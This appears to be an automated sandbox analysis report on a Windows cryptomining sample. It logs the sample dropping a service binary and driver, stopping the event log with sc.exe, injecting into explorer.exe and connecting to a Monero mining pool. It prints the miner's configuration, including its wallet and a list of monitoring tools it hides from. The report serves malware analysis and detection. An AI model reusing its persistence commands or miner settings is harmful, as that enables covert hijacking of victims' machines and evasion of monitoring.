            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: LfHJdrALlh.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeFile read: C:\Users\user\Desktop\LfHJdrALlh.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\LfHJdrALlh.exe "C:\Users\user\Desktop\LfHJdrALlh.exe"
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "DQKVOCSM"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "DQKVOCSM"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "DQKVOCSM"Jump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "DQKVOCSM" binpath= "C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "DQKVOCSM"Jump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: LfHJdrALlh.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: LfHJdrALlh.exeStatic file information: File size 2623488 > 1048576
            Source: LfHJdrALlh.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277800
            Source: LfHJdrALlh.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ograohtgkfie.exe, 00000009.00000003.2017988558.0000022902070000.00000004.00000001.00020000.00000000.sdmp, xvkjzlkkmfrj.sys.9.dr
            Source: LfHJdrALlh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: LfHJdrALlh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: LfHJdrALlh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: LfHJdrALlh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: LfHJdrALlh.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: LfHJdrALlh.exeStatic PE information: section name: .00cfg
            Source: ograohtgkfie.exe.0.drStatic PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeCode function: 0_2_00007FF612D31394 push qword ptr [00007FF612D3A004h]; ret 0_2_00007FF612D31403
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeCode function: 9_2_00007FF621A91394 push qword ptr [00007FF621A9A004h]; ret 9_2_00007FF621A91403
            Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001394 push qword ptr [0000000140008004h]; ret 11_2_0000000140001403

            Persistence and Installation Behavior

            barindex
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeFile created: C:\Windows\TEMP\xvkjzlkkmfrj.sysJump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeFile created: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeJump to dropped file
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeFile created: C:\Windows\Temp\xvkjzlkkmfrj.sysJump to dropped file
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeFile created: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeJump to dropped file
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeFile created: C:\Windows\Temp\xvkjzlkkmfrj.sysJump to dropped file
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "DQKVOCSM"
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: explorer.exe, 0000000C.00000002.4486706157.0000000001355000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE1
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE^L
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=43BPSBHAKF7EPCJ3G1HUHUAPLUKVGEVGNEVG51BYPJHEUPBLXXFACXH1CBEAGDVXUF2IFIBRBS9DJRGP7XZJF7ZIRAHRFMG--PASS=--CPU-MAX-THREADS-HINT=50--CINIT-WINRING=XVKJZLKKMFRJ.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=100--CINIT-ID=EYBKNKETVFIGHKQEUV
            Source: explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEG
            Source: explorer.exe, 0000000C.00000002.4486706157.0000000001355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEBUFFERTEM
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="43BPSBHAKF7EPCJ3G1HUHUAPLUKVGEVGNEVG51BYPJHEUPBLXXFACXH1CBEAGDVXUF2IFIBRBS9DJRGP7XZJF7ZIRAHRFMG" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="XVKJZLKKMFRJ.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=100 --CINIT-ID="EYBKNKETVFIGHKQE"
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeDropped PE file which has not been started: C:\Windows\Temp\xvkjzlkkmfrj.sysJump to dropped file
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeAPI coverage: 3.4 %
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeAPI coverage: 3.4 %
            Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
            Source: C:\Windows\explorer.exe TID: 5764Thread sleep count: 47 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 5764Thread sleep count: 99 > 30Jump to behavior
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW O`%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSp
            Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\LfHJdrALlh.exeCode function: 0_2_00007FF612D31160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF612D31160
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeCode function: 9_2_00007FF621A91160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,9_2_00007FF621A91160
            Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,11_2_0000000140001160

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 51.15.58.224 10343Jump to behavior
            Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exeMemory written: PID: 3136 base: 140000000 value: 4DJump to behavior
